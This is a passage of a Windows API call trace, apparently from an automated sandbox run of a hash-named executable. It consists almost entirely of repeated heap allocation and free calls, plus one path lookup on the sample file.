hHeap=0x12c0000) returned 1 [0117.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd5c0 | out: hHeap=0x12c0000) returned 1 [0117.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd5f0 | out: hHeap=0x12c0000) returned 1 [0117.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc190 | out: hHeap=0x12c0000) returned 1 [0117.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbc80 | out: hHeap=0x12c0000) returned 1 [0117.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dc370 | out: hHeap=0x12c0000) returned 1 [0117.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dd560 | out: hHeap=0x12c0000) returned 1 [0117.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbc20 | out: hHeap=0x12c0000) returned 1 [0117.672] CloseHandle (hObject=0x1dc) returned 1 [0117.672] IUnknown:Release (This=0x12dbf30) returned 0x0 [0117.674] FreeLibrary (hLibModule=0xf20000) returned 1 [0117.674] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", nBufferLength=0x7fff, lpBuffer=0x7dfed0, lpFilePart=0x7ffef0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", lpFilePart=0x7ffef0*="efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe") returned 0x62 [0117.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.675] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.675] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.680] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.680] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.681] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.681] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.681] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.681] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.681] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.682] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483bb8 [0117.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483bb8 | out: hHeap=0x12c0000) returned 1 [0117.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.682] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483bb8 [0117.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483bb8 | out: hHeap=0x12c0000) returned 1 [0117.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.683] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.683] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.684] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483bb8 [0117.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483bb8 | out: hHeap=0x12c0000) returned 1 [0117.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.684] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.685] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.685] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.686] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.686] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.687] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.687] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.688] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.688] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483bb8 [0117.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.689] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.689] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483bb8 | out: hHeap=0x12c0000) returned 1 [0117.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c48 [0117.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c48 | out: hHeap=0x12c0000) returned 1 [0117.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.690] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.690] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ba8 | out: hHeap=0x12c0000) returned 1 [0117.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.691] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.691] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483ac8 | out: hHeap=0x12c0000) returned 1 [0117.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ba8 [0117.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483ac8 [0117.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.692] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.692] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483bb8 [0117.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483bb8 | out: hHeap=0x12c0000) returned 1 [0117.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b58 [0117.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483b68 [0117.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b68 | out: hHeap=0x12c0000) returned 1 [0117.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483b58 | out: hHeap=0x12c0000) returned 1 [0117.693] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1483c38 | out: hHeap=0x12c0000) returned 1 [0117.693] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x1483c38 [0117.693] 